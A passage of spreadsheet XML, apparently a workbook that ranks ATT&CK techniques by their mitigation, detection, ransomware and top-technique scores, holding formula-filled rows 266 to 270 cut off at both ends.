        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7619047619047619E-2</v>
      </c>
      <c r="B266" s="25">
        <f>SUM(H266,M266,V266)*(1+SUM(AE266,AG266,AI266,AK266,AM266))</f>
        <v>0.27619047619047621</v>
      </c>
      <c r="C266" s="25" t="s">
        <v>1127</v>
      </c>
      <c r="D266" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E266" s="25" t="s">
        <v>1128</v>
      </c>
      <c r="F266" s="51">
        <v>1</v>
      </c>
      <c r="G266" s="51">
        <v>1</v>
      </c>
      <c r="H266" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I266">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J266">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K266">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L266">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M266" s="25">
        <v>0</v>
      </c>
      <c r="N266" s="51">
        <v>0</v>
      </c>
      <c r="O266" s="51">
        <v>1</v>
      </c>
      <c r="P266" s="51">
        <v>0</v>
      </c>
      <c r="Q266" s="51">
        <v>0</v>
      </c>
      <c r="R266" s="52" t="s">
        <v>1129</v>
      </c>
      <c r="S266" s="51">
        <v>9</v>
      </c>
      <c r="T266" s="52" t="s">
        <v>1130</v>
      </c>
      <c r="U266" s="51">
        <v>9</v>
      </c>
      <c r="V266" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1761904761904762</v>
      </c>
      <c r="W266">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X266">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y266">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z266">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA266">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB266">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC266" s="29"/>
      <c r="AD266" s="25" t="str" cm="1">
        <f t="array" ref="AD266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE266" s="25">
        <f>IF(AD266="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF266" s="25" t="str" cm="1">
        <f t="array" ref="AF266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG266" s="25">
        <f>IF(AF266="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH266" s="25" t="str" cm="1">
        <f t="array" ref="AH266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI266" s="25">
        <f>IF(AH266="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ266" s="25" t="str" cm="1">
        <f t="array" ref="AJ266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK266" s="25">
        <f>IF(AJ266="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL266" s="25" t="str" cm="1">
        <f t="array" ref="AL266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM266" s="25">
        <f>IF(AL266="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN266" s="60">
        <v>0</v>
      </c>
      <c r="AO266" s="51">
        <v>0</v>
      </c>
      <c r="AP266" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7619047619047619E-2</v>
      </c>
      <c r="AQ266" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.2063492063492069E-2</v>
      </c>
      <c r="AR266" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.2063492063492069E-2</v>
      </c>
      <c r="AS266" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT266" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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67" spans="1:47" ht="32.1">
      <c r="A267" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.673333333333334E-2</v>
      </c>
      <c r="B267" s="25">
        <f>SUM(H267,M267,V267)*(1+SUM(AE267,AG267,AI267,AK267,AM267))</f>
        <v>0.3673333333333334</v>
      </c>
      <c r="C267" s="25" t="s">
        <v>1131</v>
      </c>
      <c r="D267" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E267" s="25" t="s">
        <v>1132</v>
      </c>
      <c r="F267" s="51">
        <v>1</v>
      </c>
      <c r="G267" s="51">
        <v>1</v>
      </c>
      <c r="H267" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I267">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J267">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K267">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L267">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M267" s="25">
        <v>0</v>
      </c>
      <c r="N267" s="51">
        <v>1</v>
      </c>
      <c r="O267" s="51">
        <v>2</v>
      </c>
      <c r="P267" s="51">
        <v>0</v>
      </c>
      <c r="Q267" s="51">
        <v>4</v>
      </c>
      <c r="R267" s="52" t="s">
        <v>1133</v>
      </c>
      <c r="S267" s="51">
        <v>5</v>
      </c>
      <c r="T267" s="52" t="s">
        <v>1134</v>
      </c>
      <c r="U267" s="51">
        <v>10</v>
      </c>
      <c r="V267" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.17619047619047618</v>
      </c>
      <c r="W267">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X267">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y267">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z267">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA267">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB267">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC267" s="29" t="s">
        <v>346</v>
      </c>
      <c r="AD267" s="25" t="str" cm="1">
        <f t="array" ref="AD267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC267)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE267" s="25">
        <f>IF(AD267="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF267" s="25" t="str" cm="1">
        <f t="array" ref="AF267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC267)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG267" s="25">
        <f>IF(AF267="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH267" s="25" t="str" cm="1">
        <f t="array" ref="AH267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC267)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI267" s="25">
        <f>IF(AH267="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ267" s="25" t="str" cm="1">
        <f t="array" ref="AJ267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC267)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK267" s="25">
        <f>IF(AJ267="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL267" s="25" t="str" cm="1">
        <f t="array" ref="AL267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC267)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM267" s="25">
        <f>IF(AL267="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN267" s="52">
        <v>0</v>
      </c>
      <c r="AO267" s="51">
        <v>0</v>
      </c>
      <c r="AP267" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.673333333333334E-2</v>
      </c>
      <c r="AQ267" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12244444444444447</v>
      </c>
      <c r="AR267" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12244444444444447</v>
      </c>
      <c r="AS267" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT267" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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68" spans="1:47" ht="48">
      <c r="A268" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10276666666666667</v>
      </c>
      <c r="B268" s="25">
        <f>SUM(H268,M268,V268)*(1+SUM(AE268,AG268,AI268,AK268,AM268))</f>
        <v>0.36100000000000004</v>
      </c>
      <c r="C268" s="25" t="s">
        <v>1135</v>
      </c>
      <c r="D268" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E268" s="25" t="s">
        <v>1136</v>
      </c>
      <c r="F268" s="51">
        <v>1</v>
      </c>
      <c r="G268" s="51">
        <v>1</v>
      </c>
      <c r="H268" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I268">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J268">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K268">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L268">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M268" s="25">
        <v>0</v>
      </c>
      <c r="N268" s="51">
        <v>0</v>
      </c>
      <c r="O268" s="51">
        <v>1</v>
      </c>
      <c r="P268" s="51">
        <v>0</v>
      </c>
      <c r="Q268" s="51">
        <v>1</v>
      </c>
      <c r="R268" s="52" t="s">
        <v>1137</v>
      </c>
      <c r="S268" s="51">
        <v>8</v>
      </c>
      <c r="T268" s="52" t="s">
        <v>1138</v>
      </c>
      <c r="U268" s="51">
        <v>9</v>
      </c>
      <c r="V268" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.17142857142857143</v>
      </c>
      <c r="W268">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X268">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y268">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z268">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA268">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB268">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC268" s="29" t="s">
        <v>810</v>
      </c>
      <c r="AD268" s="25" t="str" cm="1">
        <f t="array" ref="AD268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC268)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE268" s="25">
        <f>IF(AD268="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF268" s="25" t="str" cm="1">
        <f t="array" ref="AF268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC268)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG268" s="25">
        <f>IF(AF268="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH268" s="25" t="str" cm="1">
        <f t="array" ref="AH268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC268)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI268" s="25">
        <f>IF(AH268="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ268" s="25" t="str" cm="1">
        <f t="array" ref="AJ268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC268)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK268" s="25">
        <f>IF(AJ268="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL268" s="25" t="str" cm="1">
        <f t="array" ref="AL268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC268)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM268" s="25">
        <f>IF(AL268="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN268" s="60">
        <v>2</v>
      </c>
      <c r="AO268" s="51">
        <v>1</v>
      </c>
      <c r="AP268" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10276666666666667</v>
      </c>
      <c r="AQ268" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12033333333333335</v>
      </c>
      <c r="AR268" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12033333333333335</v>
      </c>
      <c r="AS268" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT268" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU26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69" spans="1:47" ht="48">
      <c r="A269" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2517142857142863E-2</v>
      </c>
      <c r="B269" s="25">
        <f>SUM(H269,M269,V269)*(1+SUM(AE269,AG269,AI269,AK269,AM269))</f>
        <v>0.32517142857142861</v>
      </c>
      <c r="C269" s="25" t="s">
        <v>1139</v>
      </c>
      <c r="D269" s="25" t="s">
        <v>381</v>
      </c>
      <c r="E269" s="25" t="s">
        <v>1140</v>
      </c>
      <c r="F269" s="51">
        <v>1</v>
      </c>
      <c r="G269" s="51">
        <v>1</v>
      </c>
      <c r="H269" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I269">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J269">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K269">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L269">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M269" s="25">
        <v>0</v>
      </c>
      <c r="N269" s="51">
        <v>0</v>
      </c>
      <c r="O269" s="51">
        <v>0</v>
      </c>
      <c r="P269" s="51">
        <v>0</v>
      </c>
      <c r="Q269" s="51">
        <v>0</v>
      </c>
      <c r="R269" s="52" t="s">
        <v>511</v>
      </c>
      <c r="S269" s="51">
        <v>9</v>
      </c>
      <c r="T269" s="52" t="s">
        <v>1141</v>
      </c>
      <c r="U269" s="51">
        <v>9</v>
      </c>
      <c r="V269" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.17142857142857143</v>
      </c>
      <c r="W269">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X269">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y269">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z269">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA269">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB269">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC269" s="29" t="s">
        <v>384</v>
      </c>
      <c r="AD269" s="25" t="str" cm="1">
        <f t="array" ref="AD269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC269)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE269" s="25">
        <f>IF(AD269="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF269" s="25" t="str" cm="1">
        <f t="array" ref="AF269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC269)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG269" s="25">
        <f>IF(AF269="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH269" s="25" t="str" cm="1">
        <f t="array" ref="AH269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC269)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI269" s="25">
        <f>IF(AH269="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ269" s="25" t="str" cm="1">
        <f t="array" ref="AJ269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC269)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK269" s="25">
        <f>IF(AJ269="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL269" s="25" t="str" cm="1">
        <f t="array" ref="AL269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC269)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM269" s="25">
        <f>IF(AL269="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN269" s="60">
        <v>0</v>
      </c>
      <c r="AO269" s="51">
        <v>0</v>
      </c>
      <c r="AP269" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2517142857142863E-2</v>
      </c>
      <c r="AQ269" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1083904761904762</v>
      </c>
      <c r="AR269" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1083904761904762</v>
      </c>
      <c r="AS269" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT269" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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70" spans="1:47" ht="32.1">
      <c r="A270" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.3520000000000007E-2</v>
      </c>
      <c r="B270" s="25">
        <f>SUM(H270,M270,V270)*(1+SUM(AE270,AG270,AI270,AK270,AM270))</f>
        <v>0.30186666666666678</v>
      </c>
      <c r="C270" s="25" t="s">
        <v>1142</v>
      </c>
      <c r="D270" s="25" t="s">
        <v>241</v>
      </c>
      <c r="E270" s="25" t="s">
        <v>1143</v>
      </c>
      <c r="F270" s="51">
        <v>1</v>
      </c>
      <c r="G270" s="51">
        <v>1</v>
      </c>
      <c r="H270" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I270">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J270">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K270">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L270">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M270" s="25">
        <v>0</v>
      </c>
      <c r="N270" s="51">
        <v>0</v>
      </c>
      <c r="O270" s="51">
        <v>0</v>
      </c>
      <c r="P270" s="51">
        <v>0</v>
      </c>
      <c r="Q270" s="51">
        <v>1</v>
      </c>
      <c r="R270" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S270" s="51">
        <v>2</v>
      </c>
      <c r="T270" s="51" t="s">
        <v>242</v>
      </c>
      <c r="U270" s="51">
        <v>15</v>
      </c>
      <c r="V270" s="25">
